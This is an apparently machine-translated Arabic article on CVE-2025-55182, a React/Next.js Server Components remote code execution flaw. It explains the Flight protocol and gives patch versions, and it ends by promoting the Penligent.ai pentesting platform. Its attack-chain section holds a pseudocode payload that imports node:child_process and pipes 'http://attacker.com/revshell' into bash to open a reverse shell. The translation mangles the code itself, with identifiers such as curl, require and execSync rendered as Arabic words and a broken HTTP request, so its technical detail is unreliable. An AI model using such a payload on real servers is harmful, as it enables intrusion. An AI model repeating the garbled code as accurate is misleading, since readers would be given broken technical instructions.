مقدمة: انهيار الحدود بين العميل والخادم
شهد أواخر عام 2025 نقلة نوعية في أمن الويب. بالنسبة لمهندسي الأمن ومختبري الاختراق, CVE-2025-55182 (ومتغيره Next.js CVE-2025-66478) تمثل واحدة من أكثر نواقل الهجوم تطورًا في التاريخ الحديث.
هذا ليس خطأ تعقيم بسيط. إنه عيب أساسي عميق في منطق "التقديم من جانب الخادم (RSC)". يسمح للمهاجمين غير المصادق عليهم باستغلال ثغرة أمنية في تنفيذ التعليمات البرمجية عن بُعد لمكونات خادم React/Next.js من خلال التلاعب ببروتوكول الاتصال الخاص الذي يستخدمه إطار العمل، متجاوزًا الدفاعات التقليدية لتنفيذ تعليمات برمجية عشوائية على الخادم.
تتخلص هذه المقالة من الزخرفة التسويقية لتقديم تحليل ثنائي المستوى للثغرات الأمنية لنخبة مهندسي الأمن.

الآلية الأساسية: تفكيك بروتوكول "الرحلة"
لاستغلال CVE-2025-55182 يجب فهم كيفية تواصل React 19 و Next.js 14+. على عكس REST/GraphQL التقليدية، يستخدم RSC تنسيق نص متدفق يُعرف باسم بروتوكول "الرحلة".
هيكل حمولة الرحلة
عندما تقوم بفحص حركة مرور الشبكة على تطبيق Next.js حديث، فإن الحمولة RSC Payload تبدو غامضة ولكنها تتبع تركيبًا لغويًا صارمًا:
جافا سكريبت
// جزء بروتوكول الطيران النموذجي 1:I["./src/components/ClientComponent.js"،["chunks/main.js"]،"افتراضي"] 2:{"props":{"title":"Dashboard","user":"$Sreact.suspense"},"children":"$1"}
1:I: يشير إلى الاستيراد. يخبر العميل/الخادم بتحميل وحدة نمطية معينة.$: يشير إلى المرجع.$1إلى الوحدة النمطية المحددة في السطر 1.$S: تشير إلى رموز رد الفعل الخاصة.
السبب الجذري إلغاء التسلسل الأعمى
قلب CVE-2025-55182 يكمن في معالجة الخادم للرسائل الواردة من العميل إلى الخادم (إجراءات الخادم). إن خادم React DOM يثق التنفيذ في دفق الرحلة الوارد ضمنيًا.
عندما يقوم العميل بتشغيل إجراء الخادم، فإنه يقوم بتسلسل الوسيطات إلى تنسيق الرحلة. يتلقى الخادم هذا ويستدعي التوابع الداخلية (مثل حلمرجع الخادم) إلى إلغاء التسلسلية الدفق.
العيب القاتل
تفشل أداة إلغاء التحويل في التحقق من صحة ما إذا كان مسار الوحدة النمطية في تعليمات I (استيراد) مدرجًا في القائمة البيضاء. هذا يسمح للمهاجم بتغيير مسار حميد مثل ./src/button.js إلى وحدة نمطية أساسية داخلية في Node.js (مثل، child_process) أو أي مكتبة أخرى موجودة في node_modules.

استنساخ الثغرات وتحليلها (برنامج العمل المفاهيمي)
إخلاء المسؤولية: هذا القسم مخصص للأغراض البحثية والدفاعية التعليمية فقط.
تسير سلسلة الهجمات المتطورة على النحو التالي
الخطوة 1: الاستطلاع
يتعرّف المهاجم على نقاط النهاية RSC، وغالبًا ما يراقب الطلبات إلى /_next/static/chunks/app/page.js أو تحليل الإجراء التالي الرؤوس في طلبات POST.
الخطوة 2: تسليح الحمولة
يقوم المهاجم بصياغة تدفق طيران مخصص. بدلاً من الدعائم الشرعية لواجهة المستخدم، يقومون بحقن سلسلة الأدوات.
منطق الحمولة:
| طلب قياسي | الطلب الخبيث (RCE Payload) |
|---|---|
المرجع: 1:I["./component.js"] | المرجع: 1:I["node:child_process"] |
الإجراء: تقديم واجهة المستخدم | الإجراء: تنفيذ الدالة المصدرة |
HTTP
`POST /v1/v1/action HTTP/1.1 نوع المحتوى: نص/x-مكوّن الإجراء التالي:
// تمثيل الكود الزائف للحقن 1:I["node:child_process", []، "execSync"] 2:2:{"الأمر": "تجعيد http://attacker.com/revshell |باش"، "args": "$1"}``
الخطوة 3: التنفيذ
- يقوم الخادم بإلغاء التسلسل
I["node:child_process"]. - ينفذ
طلب("عملية_فرعية")في سياق الخادم. - يستدعي
مزامنة التنفيذبحجج المهاجم. - تم الإنجاز.
لماذا تفشل أدوات الأمن التقليدية (WAF/DAST)
بالنسبة للمهندس الأمني المتمرس، فإن اكتشاف هذا الأمر يمثل كابوساً.
- غموض البروتوكول: ترى WAFs حمولات الطيران كنص غير منظم. لن يتم تشغيل قواعد SQLi القياسية أو قواعد إعادة صياغة XSS على سلسلة استيراد وحدة نمطية مثل
1:I. - التعرض الافتراضي: حتى لو كان المطور يستخدم Next.js فقط للإنشاء الثابت، فإن تضمين مكتبة RSC غالبًا ما يكشف نقاط نهاية التحويل غير المحصنة افتراضيًا.
هذا مثال نموذجي على هشاشة سلسلة التوريد-العيب في إطار العمل، وليس في منطق عملك.
الدفاع المتقدم ودور الذكاء الاصطناعي العميل
المعالجة الفورية
التصحيح إلزامي. لا تعتمد على البرمجيات الوسيطة "التعقيم"، لأن البروتوكول معقد للغاية بحيث لا يمكن تحليله بشكل موثوق باستخدام regex.
- رد الفعل: تحديث إلى 19.2.1.
- التالي: تحديث إلى 14.2.21, 15.1.2أو أحدث إصدار كناري.
مستقبل اختبار الاختراق: الذكاء الاصطناعي العميل
مواجهة نقاط الضعف مثل CVE-2025-55182 التي تستغل منطق بروتوكول الملكية، فإن الماسحات الضوئية التقليدية عفا عليها الزمن. فهي لا يمكنها "فهم" الرحلة، ولا يمكنها إنشاء تدفقات صالحة منطقياً ولكنها خبيثة.
هذا هو المكان Penligent.ai يخلق فئة جديدة من الدفاع. كمنصة مدعومة بـ الذكاء الاصطناعي العميل، تقدم Penligent قدرات تكافح الفرق البشرية لتوسيع نطاقها:
- الفهم الدلالي للبروتوكول: يقوم وكلاء الذكاء الاصطناعي في Penligent بتحليل مواصفات React Flight بشكل ديناميكي. يفهمون بناء مراجع الوحدات النمطية مقابل دعائم البيانات.
- تشويش المنطق التكيفي: يولد العملاء الآلاف من الحمولات المتحولة، ويقومون على وجه التحديد باستكشاف شروط حدود أداة إزالة التشفير للعثور على أنماط وصول غير مصرح بها للوحدات النمطية.
- التحقق الآلي: يتجاوز Penligent مجرد الإبلاغ عن "مشكلة محتملة". فهو يحاول إنشاء سلاسل آمنة وغير مدمرة لإثبات صحة المفهوم للتحقق مما إذا كان الاحتيال الاحتكاري ممكنًا بالفعل، مما يؤدي إلى القضاء على الإيجابيات الخاطئة.
بالنسبة للمؤسسات التي تحمي البنية التحتية الحيوية، فإن نشر Penligent.ai يوفر قدرات ذكية ومتواصلة وذكية في مجال الفريق الأحمر تتطور بشكل أسرع من المهاجمين.
الخاتمة
CVE-2025-55182 هو أكثر من مجرد خطأ؛ إنه نتيجة عدم وضوح الخطوط الفاصلة بين العميل والخادم في تطوير الويب الحديث. بينما ندفع نحو أداء أعلى من خلال RSC، يتسع نطاق الهجوم ليشمل طبقة تسلسل البيانات.
بالنسبة لمهندسي الأمان، أصبح إتقان بروتوكول Flight مطلباً الآن. قم بمراجعة التبعيات الخاصة بك، وقم بتصحيحها على الفور، وفكر في التحقق من الأمان القائم على الذكاء الاصطناعي للبقاء في المقدمة.
مراجع السلطة:

